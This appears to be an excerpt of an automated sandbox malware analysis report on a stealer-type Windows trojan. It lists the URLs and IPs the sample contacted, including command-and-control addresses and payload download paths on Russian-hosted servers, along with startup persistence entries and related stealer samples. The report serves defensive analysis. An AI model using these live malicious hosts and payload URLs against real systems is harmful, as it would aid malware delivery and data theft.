https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	MSBuild.exe, 0000000C.00000002.2979656703.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002AD4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.000000000291B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D7D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D18000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A92000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A76000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002B2C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.172.128.76/3cd2b41cbde8fc9c.phpb530a5706ea79088c3d36b56fcb77release4d62687a42cd9519ca69bf	u3bs.0.exe, 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	u3bs.0.exe, 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmp, u3bs.0.exe, 00000001.00000003.1982604362.00000000246ED000.00000004.00000020.00020000.00000000.sdmp	false		high
http://gdlp01.c-wss.com/rmds/ic/universalinstaller/common/checkconnection	run.exe, run.exe, 00000005.00000002.2295837403.000000000022C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000005.00000000.2239188364.000000000022C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000D.00000002.2727602802.000000000022C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000D.00000000.2649348113.000000000022C000.00000002.00000001.01000000.00000009.sdmp, run.exe.0.dr	false		high
http://185.172.128.76/3cd2b41cbde8fc9c.phpt	u3bs.0.exe, 00000001.00000002.2975335845.0000000004383000.00000004.00000020.00020000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.	u3bs.3.exe, 00000011.00000002.2974514605.00000000026CC000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	MSBuild.exe, 0000000C.00000002.2979656703.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002AD4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.000000000291B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D7D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D18000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A92000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A76000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002B2C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.symauth.com/cps0(	run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://pastebin.com/raw/z9pYkqPQ	MSBuild.exe, 0000001B.00000002.2976876092.00000000033A1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	u3bs.0.exe, 00000001.00000003.2563120813.0000000005CC1000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.172.128.76/15f649199f40275b/vcruntime140.dll)	u3bs.0.exe, 00000001.00000002.2975335845.0000000004367000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	MSBuild.exe, 0000000C.00000002.2979656703.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002AD4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.000000000291B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D7D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D18000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A92000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A76000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002B2C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007614000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.symauth.com/rpa00	run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exebbC	u3bs.3.exe, 00000011.00000002.2969616251.00000000008D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007614000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.info-zip.org/	run.exe, 00000005.00000002.2297293359.0000000003B79000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005628000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E01000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.0000000005721000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.172.128.203/tiktok.exet-Disposition:	u3bs.0.exe, 00000001.00000002.2968269740.0000000000447000.00000040.00000001.01000000.00000005.sdmp	false	15%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.172.128.203/tiktok.exe&	u3bs.0.exe, 00000001.00000002.2995019108.000000002A7E2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://download.iolo.net	TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007228000.00000004.00000020.00020000.00000000.sdmp, u3bs.3.exe, 00000011.00000000.2777480035.000000000041C000.00000020.00000001.01000000.00000012.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.6-	u3bs.3.exe, 00000011.00000002.2974514605.00000000026A4000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.172.128.76	u3bs.0.exe, 00000001.00000002.2975209039.0000000004314000.00000040.00000020.00020000.00000000.sdmp	true	14%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.172.128.76/15f649199f40275b/vcruntime140.dll:	u3bs.0.exe, 00000001.00000002.2975335845.0000000004367000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	MSBuild.exe, 0000000C.00000002.2979656703.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002AD4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.000000000291B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D7D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D18000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A92000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A76000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002B2C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.172.128.76/15f649199f40275b/nss3.dllb	u3bs.0.exe, 00000001.00000002.2975335845.000000000432A000.00000004.00000020.00020000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.172.128.90	unknown	Russian Federation	50916	NADYMSS-ASRU	true
185.172.128.228	unknown	Russian Federation	50916	NADYMSS-ASRU	false
185.172.128.203	unknown	Russian Federation	50916	NADYMSS-ASRU	false
20.157.87.45	svc.iolo.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
185.172.128.76	unknown	Russian Federation	50916	NADYMSS-ASRU	true
176.97.76.106	note.padd.cn.com	United Kingdom	43658	INTRAFFIC-ASUA	false
185.172.128.59	unknown	Russian Federation	50916	NADYMSS-ASRU	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
142.251.32.100	www.google.com	United States	15169	GOOGLEUS	false
91.215.85.66	unknown	Russian Federation	34665	PINDC-ASRU	true

Private

IP
192.168.2.4

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1432428
Start date and time:	2024-04-27 02:18:04 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 0s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	TNQTc6Qmkg.exe renamed because original name is a hash value
Original Sample Name:	fcac04fb67b3dec2db923867c5cb0701.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@42/65@5/11
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 85% Number of executed functions: 112 Number of non-executed functions: 248
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.165.165.26, 72.21.81.240, 20.3.187.198, 192.229.211.108, 20.242.39.171, 20.12.23.50, 142.250.65.206, 23.41.168.93, 142.251.40.227, 142.251.163.84, 34.104.35.123, 23.51.58.94, 40.126.24.146, 40.126.24.147, 20.190.152.22, 40.126.24.149, 40.126.24.148, 40.126.24.82, 20.190.152.21, 20.190.152.19, 20.190.152.20, 40.126.24.83, 40.126.24.81
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, clients2.google.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, glb.cws.prod.dcat.dsp.trafficmanager.net, ocsp.edge.digicert.com, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, prod.fs.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, accounts.google.com, wu.ec.azureedge.net, www.tm.v4.a.prd.aadg.akadns.net, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, edgedl.me.gvt1.com, clients.l.google.com, www.tm.lg.prod.aadmsa.trafficmanager.net
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
01:20:11	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT6C30.tmp
01:20:25	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\il_Plugin_v1.lnk
02:20:15	API Interceptor	1x Sleep call for process: cmd.exe modified
02:20:28	API Interceptor	360x Sleep call for process: MSBuild.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.172.128.90	VucRf0jboS.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=two&s=ab&sub=0
	kO1P1YnLst.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=eight&s=ab&sub=0
	wxfSIz4PAi.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=two&s=ab&sub=0
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=one&s=ab&sub=2838
	JHqNlw9U8c.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=one&s=ab&sub=0
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=one&s=ab&sub=28381000
	QPoX60yhZt.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=one&s=ab&sub=0
	R0hb7jyBcv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0
	g77dRQ1Csm.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0
	QEO2mJ8xHx.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.90/cpa/ping.php?substr=seven&s=ab&sub=0
185.172.128.228	VucRf0jboS.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	kO1P1YnLst.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	wxfSIz4PAi.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	JHqNlw9U8c.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	QPoX60yhZt.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	R0hb7jyBcv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	g77dRQ1Csm.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.228/BroomSetup.exe
	QEO2mJ8xHx.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.228/ping.php?substr=seven

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
fp2e7a.wpc.phicdn.net	https://thehitchhouse.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	192.229.211.108
	https://friwin2.z13.web.core.windows.net/	Get hash	malicious	TechSupportScam	Browse	192.229.211.108
	https://ai7wzovlc.duckdns.org/	Get hash	malicious	Unknown	Browse	192.229.211.108
	VucRf0jboS.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	192.229.211.108
	https://svuch3d.duckdns.org/	Get hash	malicious	Unknown	Browse	192.229.211.108
	https://rlx10ld2n.duckdns.org/	Get hash	malicious	Unknown	Browse	192.229.211.108
	https://htceram.com/	Get hash	malicious	Unknown	Browse	192.229.211.108
	https://ixkv5pf.duckdns.org/	Get hash	malicious	Unknown	Browse	192.229.211.108
	https://www.steampowered.solutions/	Get hash	malicious	Unknown	Browse	192.229.211.108
	https://verfolgung-lieferung.net/	Get hash	malicious	Unknown	Browse	192.229.211.108
iolo0.b-cdn.net	VucRf0jboS.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.93.1.247
	kO1P1YnLst.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	169.150.236.100
	wxfSIz4PAi.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	195.181.163.193
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	156.146.43.65
	JHqNlw9U8c.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	195.181.163.196
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	195.181.163.196
	QPoX60yhZt.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	195.181.163.195
	R0hb7jyBcv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	169.150.236.98
	g77dRQ1Csm.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	169.150.236.97
	j36lCJ7IcT.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.93.1.251
svc.iolo.com	VucRf0jboS.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	kO1P1YnLst.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	wxfSIz4PAi.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	JHqNlw9U8c.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	QPoX60yhZt.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	R0hb7jyBcv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	g77dRQ1Csm.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	j36lCJ7IcT.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	20.157.87.45
note.padd.cn.com	VucRf0jboS.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	kO1P1YnLst.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	wxfSIz4PAi.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	JHqNlw9U8c.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	QPoX60yhZt.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	R0hb7jyBcv.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	g77dRQ1Csm.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	176.97.76.106
	QEO2mJ8xHx.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	176.97.76.106

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NADYMSS-ASRU	VucRf0jboS.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	kO1P1YnLst.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	wxfSIz4PAi.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	JHqNlw9U8c.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	QPoX60yhZt.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	3R18jv6iGv.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.111
	YEnIrzZUUw.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.111
	bUcIhJ4VHm.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.76
NADYMSS-ASRU	VucRf0jboS.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	kO1P1YnLst.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	wxfSIz4PAi.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	JHqNlw9U8c.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	file.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	QPoX60yhZt.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	185.172.128.59
	3R18jv6iGv.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.111
	YEnIrzZUUw.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.111
	bUcIhJ4VHm.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	185.172.128.76
MICROSOFT-CORP-MSN-AS-BLOCKUS	https://friwin2.z13.web.core.windows.net/	Get hash	malicious	TechSupportScam	Browse	13.107.213.40
	https://pub-12c79d09670f4464af9de32e4799a256.r2.dev/12345.html	Get hash	malicious	HTMLPhisher	Browse	13.107.246.70
	VucRf0jboS.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	https://pub-9d425aa9335c4307a502c0721d499bdd.r2.dev/officemm.html	Get hash	malicious	HTMLPhisher	Browse	13.107.213.40
	kO1P1YnLst.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse	20.157.87.45
	https://document.mamabiller59.workers.dev/	Get hash	malicious	HTMLPhisher	Browse	13.107.246.38
